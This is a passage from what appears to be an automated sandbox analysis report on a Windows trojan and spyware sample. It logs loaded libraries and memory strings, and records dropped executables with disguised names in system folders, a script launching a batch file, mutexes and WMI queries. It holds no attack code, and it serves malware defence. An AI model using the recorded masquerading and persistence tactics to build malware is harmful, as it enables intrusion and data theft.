0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, 
qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, 
qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://www.ecosia.org/newtab/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Window created: window name: CLIPBRDWNDCLASS

                          System Summary

                          Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe Process Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: 0_2_00366FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00366FAA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Windows\CbsTemp\d6e33f2cde6d42
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Windows\Help\mui\d6e33f2cde6d42
                          Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AFgebewE.log 9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: String function: 0037EB78 appears 39 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: String function: 0037F5F0 appears 31 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: String function: 0037EC50 appears 56 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: dxgidebug.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: dwmapi.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: riched20.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: usp10.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: msls31.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: windowscodecs.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: textinputframework.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: coremessaging.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: policymanager.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: msvcp110_win.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: pcacli.dll
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Section loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: version.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: slc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dpapi.dllJump to behavior
Source: CJF0Ri1HrG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/280@2/1
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_00366C74 GetLastError,FormatMessageW,0_2_00366C74
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_0037A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0037A6C2
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Program Files (x86)\windows photo viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\EMydcNjR.log
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Mutant created: NULL
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\c1cae4480a59c5014b843817dcbc793c3642b8e5032f288ad3b1f4c88d568202
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\AppData\Local\Temp\Q907SiRxS1
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Command line argument: sfxname | 0_2_0037DF1E
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Command line argument: sfxstime | 0_2_0037DF1E
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Command line argument: STARTDLG | 0_2_0037DF1E
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Command line argument: xz; | 0_2_0037DF1E
Source: CJF0Ri1HrG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
